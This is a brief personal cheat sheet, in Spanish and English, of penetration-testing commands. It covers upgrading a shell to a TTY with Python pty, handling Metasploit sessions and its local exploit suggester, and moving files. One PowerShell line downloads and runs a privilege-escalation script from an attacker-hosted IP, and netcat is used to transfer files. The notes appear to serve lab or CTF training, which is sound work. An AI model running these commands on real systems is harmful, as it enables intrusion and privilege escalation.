Shells
------------------------------------------------------------------
Upgrade python shell (o tty console)
python -c 'import pty; pty.spawn("/bin/bash")'  
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/


Metasploit
-------------------------------------------------------------------
Suggester: multi/recon/local_exploit_suggester

Control + Z para poner la sesi贸n con la shell en background

stty raw -echo
introducir fg (foreground) para volver a la sesi贸n.

para volver a una sesi贸n especifica:  sessions -i NUMERO_SESION

para upgradear una shell de meterpreter hay que usar el comando "shell".


Pasar ficheros
--------------------------------------------------------------------
Con Powershell desde una sesi贸n:
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/Invoke-MS16032.ps1') para descargas ficheros con powershell 
(previamente abriendo un servidor con python -m SimpleHttpServer)

Con Netcat:
On the receiving end running:
nc -l -p 1234 > out.file

On the sending end running:
nc -w 3 [destination] 1234 < out.file
